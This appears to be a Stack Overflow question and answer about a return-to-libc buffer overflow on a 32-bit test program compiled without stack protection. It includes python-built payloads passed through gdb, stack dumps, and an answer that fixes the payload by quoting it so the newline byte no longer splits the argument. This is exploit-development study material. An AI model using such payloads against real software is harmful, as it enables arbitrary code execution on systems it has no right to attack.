certain parts of injected string are missing on stack frame
I'm trying return-to-libc exploit on simple program. I've managed to locate stack address where input string is stored, and locations of libc functions and build my payload base on it.
[padding(252-byte)] + [system(4-byte)] + [exit(4-byte)] + [argument(4-byte)]
I opened the vulnerable program with gdb and injected payload. When I check stack frame I can see 252 byte padding loaded on correct location but the last 12-byte part of the payload seem to be missing or, somehow replace with some duds.
So out of curiosity I changed my payload a bit, particularly the padding part.
[padding(96)]+[system(4)]+[padding(152)]+[system(4)]+[exit(4)]+[argument(4)]
Then the stack holds only the first 96-byte part and the rest is not there.
I injected the payload with python on 64 bit kali-linux. The vulnerable program is compiled with gcc with -m32 -fno-stack-protector option.
(gdb) run $(python -c 'print "\x41"*252 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')
(gdb) x/256xw $ebp-0xfc
0xffffd010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd070: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd100: 0x41414141 0x41414141 0x41414141 0x00000060
0xffffd110: 0xffffd130 0x080dc000 0x00000000 0x0804a25b
0xffffd120: 0x080dc000 0x080dc000 0x080dc000 0x0804a25b
0xffffd130: 0x00000003 0xffffd1e4 0xffffd1f4 0xffffd184
0xffffd140: 0x00000000 0x00000000 0x00000000 0x080dc000
...
(gdb) run $(python -c 'print "\x41"*96 +"\x60\x0a\x05\x08"+ "\x41"*152 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')
(gdb) x/256wx $ebp-0xfc
0xffffd010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd070: 0x00000060 0x00000000 0x0000bfc0 0xa9173800
0xffffd080: 0x080b12ef 0x00002933 0x00000000 0x080dc000
0xffffd090: 0x00000001 0x080dc000 0x080dd900 0x080495fa
0xffffd0a0: 0x00000004 0x080ddf74 0x0804fa99 0x00008000
0xffffd0b0: 0x080b0fa5 0x00040000 0x00000000 0x080abc6a
...
It seems the address \x60\x0a\x05\x08 is somehow replaced with \x60\x00\x00\x00. Is there something I'm missing? Or is this has to do with the compiler?
bibichachooo1 Answer
It seems you're trying to run the program passing the payload as argument, but it contains character \x0a which causes the payload to be split into two separate arguments.
Adding double quotes around the command should allow you to pass it as single argument:
(gdb) run "$(python -c 'print "\x41"*252 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')"
yachoorUser contributions licensed under CC BY-SA 3.0